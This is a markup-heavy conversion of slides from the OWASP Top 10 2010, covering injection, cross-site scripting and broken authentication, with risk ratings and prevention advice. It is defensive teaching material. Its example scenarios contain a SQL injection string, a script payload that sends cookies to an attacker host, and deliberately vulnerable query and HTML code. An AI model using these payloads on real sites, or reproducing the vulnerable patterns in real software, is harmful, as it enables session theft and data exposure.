| class="ce44" style="text-align: left; width: 2.01cm" |
 
<span class="T20">Weakness Detectability</span>
 
| class="ce45" style="text-align: left; width: 2.01cm" |
 
<span class="T20">Technical Impact</span>
 
| class="ce46" style="text-align: left; width: 1.696cm" |
 
<span class="T20">Business Impact</span>
 
|- class="ro15"
 
| class="ce47" style="text-align: left; width: 1.693cm" rowspan="3" |
 
<span class="T21">?</span>
 
| class="ce48" style="text-align: left; width: 2.01cm" |
 
<span class="T20">Easy</span>
 
| class="ce49" style="text-align: left; width: 2.01cm" |
 
<span class="T20">Widespread</span>
 
| class="ce50" style="text-align: left; width: 2.01cm" |
 
<span class="T20">Easy</span>
 
| class="ce51" style="text-align: left; width: 2.01cm" |
 
<span class="T20">Severe</span>
 
| class="ce52" style="text-align: left; width: 1.696cm" rowspan="3" |
 
<span class="T21">?</span>
 
|- class="ro15"
 
| class="ce54" style="text-align: left; width: 2.01cm" |
 
<span class="T20">Average</span>
 
| class="ce55" style="text-align: left; width: 2.01cm" |
 
<span class="T20">Common</span>
 
| class="ce56" style="text-align: left; width: 2.01cm" |
 
<span class="T20">Average</span>
 
| class="ce57" style="text-align: left; width: 2.01cm" |
 
<span class="T20">Moderate</span>
 
|- class="ro16"
 
| class="ce58" style="text-align: left; width: 2.01cm" |
 
<span class="T20">Difficult</span>
 
| class="ce59" style="text-align: left; width: 2.01cm" |
 
<span class="T20">Uncommon</span>
 
| class="ce60" style="text-align: left; width: 2.01cm" |
 
<span class="T20">Difficult</span>
 
| class="ce61" style="text-align: left; width: 2.01cm" |
 
<span class="T20">Minor</span>
 
|}
 
 
 
[[Image:./]]
 
 
 
</div><div id="Title_62" class="P5" style="height: 2.116cm; width: 15.239cm"><div>
 
 
 
<span class="T5">Application Security Risks</span>
 
 
 
</div></div><div id="Text_Placeholder_64" class="P5" style="height: 2.307cm; width: 3.597cm"><div>
 
 
 
* <span style="display: block; float: left; min-width: 0.952cm">•</span><span class="T6">Risk</span><span class="odfLiEnd"> </span>
 
 
 
</div></div><div id="Notes_Placeholder_2" class="P5" style="height: 0.001cm; width: 0.001cm"><div>
 
 
 
</div></div><div id="Slide_Number_Placeholder_3" class="P4" style="height: 0.001cm; width: 0.001cm"><div>
 
 
 
<span class="T4"><span title="page-number">5</span></span><span class="T4"><span title="page-number">5</span></span>
 
 
 
</div></div></div><div id="page6" class="dp3"><div id="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" class="P8" style="height: 7.407cm; width: 2.264cm">
 
 
 
[[Image:.]]
 
 
 
</div><div id="{C7383E11-2997-46ED-9CDE-19D4351797B7}" class="P8" style="height: 7.407cm; width: 2.264cm">
 
 
 
[[Image:.]]
 
 
 
</div><div id="{A1B85367-743A-4C9F-A891-07038BBF96F2}" class="P8" style="height: 7.407cm; width: 2.264cm">
 
 
 
[[Image:.]]
 
 
 
</div><div id="{2BD590FA-9231-49C0-97E0-217A496C2237}" class="P8" style="height: 7.407cm; width: 2.264cm">
 
 
 
[[Image:.]]
 
 
 
</div><div id="{C03D2B45-045F-419F-9A43-BA3CEAFBC613}" class="P8" style="height: 7.407cm; width: 2.264cm">
 
 
 
[[Image:.]]
 
 
 
</div><div id="{47E9EF4E-AA7A-42E3-9DB3-FF494FD47A04}" class="P8" style="height: 7.407cm; width: 2.264cm">
 
 
 
[[Image:.]]
 
 
 
</div><div id="{DA7DD3FF-C2BA-419E-88D3-4DE8B0D3FE4D}" class="P8" style="height: 7.407cm; width: 2.264cm">
 
 
 
[[Image:.]]
 
 
 
</div><div id="{3A1C44CE-CCA3-4BD0-B54E-89DB7E3E4543}" class="P8" style="height: 0.001cm; width: 0.001cm">
 
 
 
[[Image:.]]
 
 
 
</div><div id="{14EF3D90-B7BF-472E-9422-7B5778E09D13}" class="P8" style="height: 7.407cm; width: 2.264cm">
 
 
 
[[Image:.]]
 
 
 
</div><div id="{2CA751A3-FAC5-4333-8C12-EE4CE8E8AB39}" class="P8" style="height: 0.001cm; width: 0.001cm">
 
 
 
[[Image:.]]
 
 
 
</div><div id="{25555832-CE6E-49DC-8853-636E1959542E}" class="P8" style="height: 7.407cm; width: 2.264cm">
 
 
 
[[Image:.]]
 
 
 
</div><div id="{7C354702-E349-4CDA-99AD-1E32BD6F3EC6}" class="P8" style="height: 7.407cm; width: 2.264cm">
 
 
 
[[Image:.]]
 
 
 
</div><div id="{F5A8502D-52C4-4B4A-ACF7-0A37A965A8B6}" class="P8" style="height: 7.407cm; width: 2.264cm">
 
 
 
[[Image:.]]
 
 
 
</div><div id="{09240EC7-522E-4395-8D61-1A972E9AC8FE}" class="P8" style="height: 7.407cm; width: 2.264cm">
 
 
 
[[Image:.]]
 
 
 
</div><div id="{5DA0AAD8-DB42-4198-B614-1D5996278F65}" class="P8" style="height: 0.001cm; width: 0.001cm">
 
 
 
[[Image:.]]
 
 
 
</div><div id="{74651D76-1A4B-4035-A912-0E9B4AC31E56}" class="P8" style="height: 7.407cm; width: 2.264cm">
 
 
 
[[Image:.]]
 
 
 
</div><div id="{4FB0F712-7A12-4305-A804-F19DB2A74F1D}" class="P8" style="height: 0.001cm; width: 0.001cm">
 
 
 
[[Image:.]]
 
 
 
</div><div id="{930B7E02-7BD0-4A1A-8B80-F9B89ACD00BA}" class="P8" style="height: 7.407cm; width: 2.264cm">
 
 
 
[[Image:.]]
 
 
 
</div><div id="{0B5E7E68-CA72-4D92-A967-DF995646C3AC}" class="P8" style="height: 7.407cm; width: 2.264cm">
 
 
 
[[Image:.]]
 
 
 
</div><div id="{C4E8E996-7C5B-4BA4-B933-DE6C0BAA3728}" class="P8" style="height: 7.407cm; width: 2.264cm">
 
 
 
[[Image:.]]
 
 
 
</div><div id="Title_4" class="P5" style="height: 2.116cm; width: 15.239cm"><div>
 
 
 
<span class="T5">OWASP Top 10 Application Security Risks – 2010 </span>
 
 
 
</div></div><div id="Text_Placeholder_5" class="P5" style="height: 2.307cm; width: 3.597cm"><div>
 
 
 
* <span style="display: block; float: left; min-width: 0.952cm">•</span><span class="T6">T10</span><span class="odfLiEnd"> </span>
 
 
 
</div></div><div id="Notes_Placeholder_2" class="P5" style="height: 0.001cm; width: 0.001cm"><div>
 
 
 
</div></div><div id="Slide_Number_Placeholder_3" class="P4" style="height: 0.001cm; width: 0.001cm"><div>
 
 
 
<span class="T4"><span title="page-number">5</span></span><span class="T4"><span title="page-number">5</span></span>
 
 
 
</div></div></div><div id="page7" class="dp3"><div id="Table_104" style="height: 7.053cm; width: 19.049cm">
 
 
 
{|
 
|- class="ro17"
 
| style="text-align: left" |
 
| style="text-align: left" |
 
| style="text-align: left" colspan="2" |
 
| style="text-align: left" |
 
| style="text-align: left" |
 
|- class="ro13"
 
| class="ce63" style="text-align: left; width: 3.175cm" |
 
<span class="T12">__________</span>
 
| class="ce64" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Exploitability</span>
 
 
 
<span class="T12">EASY</span>
 
| class="ce65" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Prevalence</span>
 
 
 
<span class="T12">COMMON</span>
 
| class="ce66" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Detectability</span>
 
 
 
<span class="T12">AVERAGE</span>
 
| class="ce67" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Impact</span>
 
 
 
<span class="T12">SEVERE</span>
 
| class="ce68" style="text-align: left; width: 3.175cm" |
 
<span class="T12">__________</span>
 
|- class="ro18"
 
| class="ce69" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Consider anyone who can send untrusted data to the system, including external users, internal users, and administrators.</span>
 
| class="ce70" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Attacker sends simple text-based attacks that exploit the syntax of the targeted interpreter. Almost any source of data can be an injection vector, including internal sources.</span>
 
| class="ce71" style="text-align: left; width: 3.175cm" colspan="2" |
 
<span class="T8">[http://www.owasp.org/index.php/Injection_Flaws Injection flaws]</span><span class="T8"> </span><span class="T8">occur when an application sends untrusted data to an interpreter. Injection flaws are very prevalent, particularly in legacy code, often found in SQL queries, LDAP queries, XPath queries, OS commands, program arguments, etc. Injection flaws are easy to discover when examining code, but more difficult via testing. Scanners and fuzzers can help attackers find them.</span>
 
| class="ce72" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Injection can result in data loss or corruption, lack of accountability, or denial of access. Injection can sometimes lead to complete host takeover.</span>
 
| class="ce73" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Consider the business value of the affected data and the platform running the interpreter. All data could be stolen, modified, or deleted.  Could your reputation be harmed?</span>
 
|}
 
 
 
[[Image:./]]
 
 
 
</div>
 
 
 
<span class="T15"><br /></span><span class="T15">Example Attack Scenario</span>
 
 
 
<span class="T8">The application uses untrusted data in the construction of the following </span><span class="T11">vulnerable</span><span class="T8"> SQL call:</span>
 
 
 
<span class="T25">  </span><span class="T25">String query = "SELECT * FROM accounts WHERE</span><span class="T25"><br /></span><span class="T25">  custID='" + request.getParameter("id") +"'";</span>
 
 
 
<span class="T8">The attacker modifies the ‘id’ parameter in their browser to send: ' or '1'='1. This changes the meaning of the query to return all the records from the accounts database, instead of only the intended customer’s.</span>
 
 
 
<span class="T25">  </span><span class="T26">http://example.com/app/accountView?id=</span><span class="T25">' or '1'='1 </span>
 
 
 
<span class="T8">In the worst case, the attacker uses this weakness to invoke special stored procedures in the database that enable a complete takeover of the database and possibly even the server hosting the database.</span>
 
 
 
<span class="T15"><br /></span><span class="T15">Am I Vulnerable To Injection?</span>
 
 
 
<span class="T8">The best way to find out if an application is vulnerable to injection is to verify that </span><span class="T11">all</span><span class="T8"> use of interpreters clearly separates untrusted data from the command or query. For SQL calls, this means using bind variables in all prepared statements and stored procedures, and avoiding dynamic queries.</span>
 
 
 
<span class="T8">Checking the code is a fast and accurate way to see if the application uses interpreters safely. Code analysis tools can help a security analyst find the use of interpreters and trace the data flow through the application. Penetration testers can validate these issues by crafting exploits that confirm the vulnerability.</span>
 
 
 
<span class="T8">Automated dynamic scanning which exercises the application may provide insight into whether some exploitable injection flaws exist. Scanners cannot always reach interpreters and have difficulty detecting whether an attack was successful. Poor error handling makes injection flaws easier to discover.</span>
 
 
 
<span class="T15"><br /></span><span class="T15">References</span>
 
 
 
<span class="T19">OWASP</span>
 
 
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet OWASP SQL Injection Prevention Cheat Sheet]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/Command_Injection OWASP Injection Flaws Article]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder.html ESAPI Encoder API]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Validator.html ESAPI Input Validation API]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/ASVS#tab=Download ASVS: Output Encoding/Escaping Requirements (V6)]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005) OWASP Testing Guide: Chapter on SQL Injection Testing]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection OWASP Code Review Guide: Chapter on SQL Injection]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/Reviewing_Code_for_OS_Injection OWASP Code Review Guide: Command Injection]</span><span class="odfLiEnd"> </span>
 
 
 
<span class="T19">External</span>
 
 
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://cwe.mitre.org/data/definitions/77.html CWE Entry 77 on Command Injection]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://cwe.mitre.org/data/definitions/89.html CWE Entry 89 on SQL Injection]</span><span class="odfLiEnd"> </span>
 
 
 
<span class="T11"></span>
 
 
 
<span class="T15"><br /></span><span class="T15">How Do I Prevent Injection?</span>
 
 
 
<span class="T8">Preventing injection requires keeping untrusted data separate from commands and queries.</span>
 
 
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">The preferred option is to use a safe API which avoids the use of the interpreter entirely or provides a parameterized interface.  Be careful of APIs, such as stored procedures, that are parameterized, but can still introduce injection under the hood.</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">If a parameterized API is not available, you should carefully escape special characters using the specific escape syntax for that interpreter. </span><span class="T8">[http://www.owasp.org/index.php/ESAPI OWASP’s ESAPI]</span><span class="T8"> has some of these </span><span class="T8">[http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder.html escaping routines]</span><span class="T8">.</span><span class="odfLiEnd"> </span>
 
 
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">Positive or “white list” input validation with appropriate canonicalization is also recommended, but is </span><span class="T11">not</span><span class="T8"> a complete defense as many applications require special characters in their input. </span><span class="T8">[http://www.owasp.org/index.php/ESAPI OWASP’s ESAPI]</span><span class="T8"> has an extensible library of </span><span class="T8">[http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Validator.html white list input validation routines]</span><span class="T8">.</span><span class="odfLiEnd"> </span>
 
 
 
<span class="T27">          </span><span class="T27">Security</span><span class="T27"><br /></span><span class="T27">          Weakness</span>
 
 
 
<span class="T27">    </span><span class="T27">Attack</span>
 
 
 
<span class="T27">    </span><span class="T27">Vectors</span>
 
 
 
<span class="T27"> </span><span class="T27">Technical</span><span class="T27"><br /></span><span class="T27">  Impacts</span>
 
 
 
<span class="T28">Threat</span><span class="T28"><br /></span><span class="T28">Agents</span>
 
 
 
<span class="T27">Business</span><span class="T27"><br /></span><span class="T27">Impacts</span>
 
 
 
<div id="Text_Placeholder_35" class="P5" style="height: 2.307cm; width: 3.597cm"><div>
 
 
 
* <span style="display: block; float: left; min-width: 0.952cm">•</span><span class="T6">A1</span><span class="odfLiEnd"> </span>
 
 
 
</div></div><div id="Title_25" class="P5" style="height: 2.116cm; width: 15.239cm"><div>
 
 
 
<span class="T5">Injection</span>
 
 
 
</div></div><div id="Notes_Placeholder_2" class="P5" style="height: 0.001cm; width: 0.001cm"><div>
 
 
 
</div></div><div id="Slide_Number_Placeholder_3" class="P4" style="height: 0.001cm; width: 0.001cm"><div>
 
 
 
<span class="T4"><span title="page-number">7</span></span><span class="T4"><span title="page-number">7</span></span>
 
 
 
</div></div></div><div id="page8" class="dp3"><div id="Table_104" style="height: 7.897cm; width: 19.049cm">
 
 
 
{|
 
|- class="ro17"
 
| style="text-align: left" |
 
| style="text-align: left" |
 
| style="text-align: left" colspan="2" |
 
| style="text-align: left" |
 
| style="text-align: left" |
 
|- class="ro19"
 
| class="ce74" style="text-align: left; width: 3.175cm" |
 
<span class="T12">__________</span>
 
| class="ce75" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Exploitability</span>
 
 
 
<span class="T12">AVERAGE</span>
 
| class="ce76" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Prevalence</span>
 
 
 
<span class="T12">VERY WIDESPREAD</span>
 
| class="ce77" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Detectability</span>
 
 
 
<span class="T12">EASY</span>
 
| class="ce78" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Impact</span>
 
 
 
<span class="T12">MODERATE</span>
 
| class="ce79" style="text-align: left; width: 3.175cm" |
 
<span class="T12">__________</span>
 
|- class="ro20"
 
| class="ce80" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Consider anyone who can send untrusted data to the system, including external users, internal users, and administrators.</span>
 
| class="ce81" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Attacker sends text-based attack scripts that exploit the interpreter in the browser. Almost any source of data can be an attack vector, including internal sources such as data from the database.</span>
 
| class="ce82" style="text-align: left; width: 3.175cm" colspan="2" |
 
<span class="T8">[http://www.owasp.org/index.php/Cross-site_Scripting_(XSS) XSS]</span><span class="T8"> </span><span class="T8">is the most prevalent web application security flaw. XSS flaws occur when an application includes user supplied data in a page sent to the browser without properly validating or escaping that content. There are three known types of XSS flaws: 1) </span><span class="T8">[http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)#Stored_XSS_Attacks Stored]</span><span class="T8">, 2) </span><span class="T8">[http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)#Reflected_XSS_Attacks Reflected]</span><span class="T8">, and 3) </span><span class="T8">[http://www.owasp.org/index.php/DOM_Based_XSS DOM based XSS]</span><span class="T8">.</span>
 
 
 
<span class="T8">Detection of most XSS flaws is fairly easy via testing or code analysis.</span>
 
| class="ce83" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Attackers can execute scripts in a victim’s browser to hijack user sessions, deface web sites, insert hostile content, redirect users, hijack the user’s browser using malware, etc.</span>
 
| class="ce84" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Consider the business value of the affected system and all the data it processes.</span>
 
 
 
<span class="T8">Also consider the business impact of public exposure of the vulnerability.</span>
 
|}
 
 
 
[[Image:./]]
 
 
 
</div>
 
 
 
<span class="T15"><br /></span><span class="T15">Example Attack Scenario</span>
 
 
 
<span class="T8">The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:</span>
 
 
 
<span class="T25">  </span><span class="T25">(String) page += "<input name='creditcard' type='TEXT‘</span><span class="T25"><br /></span><span class="T25">  value='" + request.getParameter("CC") + "'>";</span>
 
 
 
<span class="T8">The attacker modifies the ‘CC’ parameter in their browser to:</span>
 
 
 
<span class="T10">  </span><span class="T25">'><script>document.location=</span><span class="T25"><br /></span><span class="T25">  'http://www.attacker.com/cgi-bin/cookie.cgi?</span><span class="T25"><br /></span><span class="T25">  foo='+document.cookie</script>'</span><span class="T8">.</span>
 
 
 
<span class="T8">This causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session. Note that attackers can also use XSS to defeat any CSRF defense the application might employ. See A5 for info on CSRF.</span>
 
 
 
<span class="T15"><br /></span><span class="T15">Am I Vulnerable to XSS?</span>
 
 
 
<span class="T8">You need to ensure that all user supplied input sent back to the browser is verified to be safe (via input validation), and that user input is properly escaped before it is included in the output page. Proper output encoding ensures that such input is always treated as text in the browser, rather than active content that might get executed.</span>
 
 
 
<span class="T8">Both static and dynamic tools can find some XSS problems automatically. However, each application builds output pages differently and uses different browser side interpreters such as JavaScript, ActiveX, Flash, and Silverlight, which makes automated detection difficult. Therefore, complete coverage requires a combination of manual code review and manual penetration testing, in addition to any automated approaches in use.</span>
 
 
 
<span class="T8">Web 2.0 technologies, such as AJAX, make XSS much more difficult to detect via automated tools.</span>
 
 
 
<span class="T15"><br /></span><span class="T15">References</span>
 
 
 
<span class="T19">OWASP</span>
 
 
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet OWASP XSS Prevention Cheat Sheet]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/Cross-site_Scripting_(XSS) OWASP Cross-Site Scripting Article]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/ESAPI ESAPI Project Home Page ]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder.html ESAPI Encoder API]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/ASVS#tab=Download ASVS: Output Encoding/Escaping Requirements (V6)]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/ASVS#tab=Download ASVS: Input Validation Requirements (V5)]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/Testing_for_Data_Validation Testing Guide: 1st 3 Chapters on Data Validation Testing]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/Reviewing_Code_for_Cross-site_scripting OWASP Code Review Guide: Chapter on XSS Review]</span><span class="odfLiEnd"> </span>
 
 
 
<span class="T19">External</span>
 
 
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://cwe.mitre.org/data/definitions/79.html CWE Entry 79 on Cross-Site Scripting]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://ha.ckers.org/xss.html RSnake’s]</span><span class="T11">[http://ha.ckers.org/xss.html  XSS Attack Cheat Sheet]</span><span class="odfLiEnd"> </span>
 
 
 
<span class="T11"></span>
 
 
 
<span class="T15"><br /></span><span class="T15">How Do I Prevent XSS?</span>
 
 
 
<span class="T8">Preventing XSS requires keeping untrusted data separate from active browser content.</span>
 
 
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">The preferred option is to properly escape all untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. Developers need to include this escaping in their applications unless their UI framework does this for them. See the </span><span class="T11">[http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet OWASP XSS Prevention Cheat Sheet]</span><span class="T8"> for more information about data escaping techniques.</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">Positive or “whitelist” input validation with appropriate canonicalization and decoding is also recommended as it helps protect against XSS, but is </span><span class="T11">not a complete defense </span><span class="T8">as many applications require special characters in their input. Such validation should, as much as possible, decode any encoded input, and then validate the length, characters, format, and any business rules on that data before accepting the input.</span><span class="odfLiEnd"> </span>
 
 
 
<div id="Title_25" class="P5" style="height: 2.116cm; width: 15.239cm"><div>
 
 
 
<span class="T29">Cross-Site Scripting (XSS)</span>
 
 
 
</div></div><div id="Text_Placeholder_26" class="P5" style="height: 2.307cm; width: 3.597cm"><div>
 
 
 
* <span style="display: block; float: left; min-width: 0.952cm">•</span><span class="T6">A2</span><span class="odfLiEnd"> </span>
 
 
 
</div></div>
 
 
 
<span class="T27">          </span><span class="T27">Security</span><span class="T27"><br /></span><span class="T27">          Weakness</span>
 
 
 
<span class="T27">    </span><span class="T27">Attack</span>
 
 
 
<span class="T27">    </span><span class="T27">Vectors</span>
 
 
 
<span class="T27"> </span><span class="T27">Technical</span><span class="T27"><br /></span><span class="T27">  Impacts</span>
 
 
 
<span class="T28">Threat</span><span class="T28"><br /></span><span class="T28">Agents</span>
 
 
 
<span class="T27">Business</span><span class="T27"><br /></span><span class="T27">Impacts</span>
 
 
 
<div id="Notes_Placeholder_2" class="P5" style="height: 0.001cm; width: 0.001cm"><div>
 
 
 
</div></div><div id="Slide_Number_Placeholder_3" class="P4" style="height: 0.001cm; width: 0.001cm"><div>
 
 
 
<span class="T4"><span title="page-number">8</span></span><span class="T4"><span title="page-number">8</span></span>
 
 
 
</div></div></div><div id="page9" class="dp3"><div id="Table_104" style="height: 7.859cm; width: 19.049cm">
 
 
 
{|
 
|- class="ro17"
 
| style="text-align: left" |
 
| style="text-align: left" |
 
| style="text-align: left" colspan="2" |
 
| style="text-align: left" |
 
| style="text-align: left" |
 
|- class="ro13"
 
| class="ce85" style="text-align: left; width: 3.175cm" |
 
<span class="T12">__________</span>
 
| class="ce86" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Exploitability</span><span class="T12"><br /></span><span class="T12">AVERAGE</span>
 
| class="ce87" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Prevalence</span>
 
 
 
<span class="T12">COMMON</span>
 
| class="ce88" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Detectability</span>
 
 
 
<span class="T12">AVERAGE</span>
 
| class="ce89" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Impact</span>
 
 
 
<span class="T12">SEVERE</span>
 
| class="ce90" style="text-align: left; width: 3.175cm" |
 
<span class="T12">__________</span>
 
|- class="ro21"
 
| class="ce91" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Consider anonymous external attackers, as well as users with their own accounts, who may attempt to steal accounts from others. Also consider insiders wanting to disguise their actions.</span>
 
| class="ce92" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Attacker uses leaks or flaws in the authentication or session management functions (e.g., exposed accounts, passwords, session IDs) to impersonate users.</span>
 
| class="ce93" style="text-align: left; width: 3.175cm" colspan="2" |
 
<span class="T8">Developers frequently build custom authentication and session management schemes, but building these correctly is hard. As a result, these custom schemes frequently have flaws in areas such as logout, password management, timeouts, remember me, secret question, account update, etc. Finding such flaws can sometimes be difficult, as each implementation is unique.</span>
 
| class="ce94" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Such flaws may allow some or even </span><span class="T11">all</span><span class="T8"> accounts to be attacked. Once successful, the attacker can do anything the victim could do. Privileged accounts are frequently targeted.</span>
 
| class="ce95" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Consider the business value of the affected data or application functions.</span>
 
 
 
<span class="T8">Also consider the business impact of public exposure of the vulnerability.</span>
 
|}
 
 
 
[[Image:./]]
 
 
 
</div>
 
 
 
<span class="T15"><br /></span><span class="T15">Example Attack Scenarios</span>
 
 
 
<span class="T11">Scenario #1</span><span class="T8"><nowiki>: Airline reservations application supports URL rewriting, putting session IDs in the URL:</nowiki></span>
 
 
 
<span class="T10">  </span><span class="T26">http://example.com/sale/saleitems;</span><span class="T25">jsessionid=</span><span class="T25"><br /></span><span class="T25">  2P0OC2JDPXM0OQSNDLPSKHCJUN2JV</span><span class="T26">?dest=Hawaii</span>
 
 
 
<span class="T8">An authenticated user of the site wants to let his friends know about the sale. He e-mails the above link without knowing he is also giving away his session ID. When his friends use the link they will use his session and credit card.</span>
 
 
 
<span class="T11">Scenario #2</span><span class="T8"><nowiki>: Application’s timeouts aren’t set properly. User uses a public computer to access site. Instead of selecting “logout” the user simply closes the browser tab and walks away. Attacker uses the same browser an hour later, and that browser is still authenticated.</nowiki></span>
 
 
 
<span class="T11">Scenario #3</span><span class="T8"><nowiki>: Insider or external attacker gains access to the system’s password database. User passwords are not encrypted, exposing every users’ password to the attacker.</nowiki></span>
 
 
 
<span class="T15"><br /></span><span class="T15">Am I Vulnerable?</span>
 
 
 
<span class="T8">The primary assets to protect are credentials and session IDs.</span>
 
 
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">Are credentials always protected when stored using hashing or encryption? See A7.</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">Can credentials be guessed or overwritten through weak account management functions (e.g., account creation, change password, recover password, weak session IDs)?</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">Are session IDs exposed in the URL (e.g., URL rewriting)?</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">Are session IDs vulnerable to session fixation attacks? </span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">Do session IDs timeout and can users log out?</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">Are session IDs rotated after successful login?</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">Are passwords, session IDs, and other credentials sent only over TLS connections? See A9.</span><span class="odfLiEnd"> </span>
 
 
 
<span class="T8">See the </span><span class="T8">[http://www.owasp.org/index.php/ASVS#tab=Download ASVS]</span><span class="T8"> requirement areas V2 and V3 for more details.</span>
 
 
 
<span class="T15"><br /></span><span class="T15">References</span>
 
 
 
<span class="T19">OWASP</span>
 
 
 
<span class="T8">For a more complete set of requirements and problems to avoid in this area, see the </span><span class="T8">[http://www.owasp.org/index.php/ASVS#tab=Download ASVS requirements areas for Authentication (V2) and Session Management (V3)]</span><span class="T8">.</span>
 
 
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/Authentication_Cheat_Sheet OWASP ]</span><span class="T11">[http://www.owasp.org/index.php/Authentication_Cheat_Sheet Authentication Cheat ]</span><span class="T11">[http://www.owasp.org/index.php/Authentication_Cheat_Sheet Sheet]</span><span class="odfLiEnd"> </span>
 
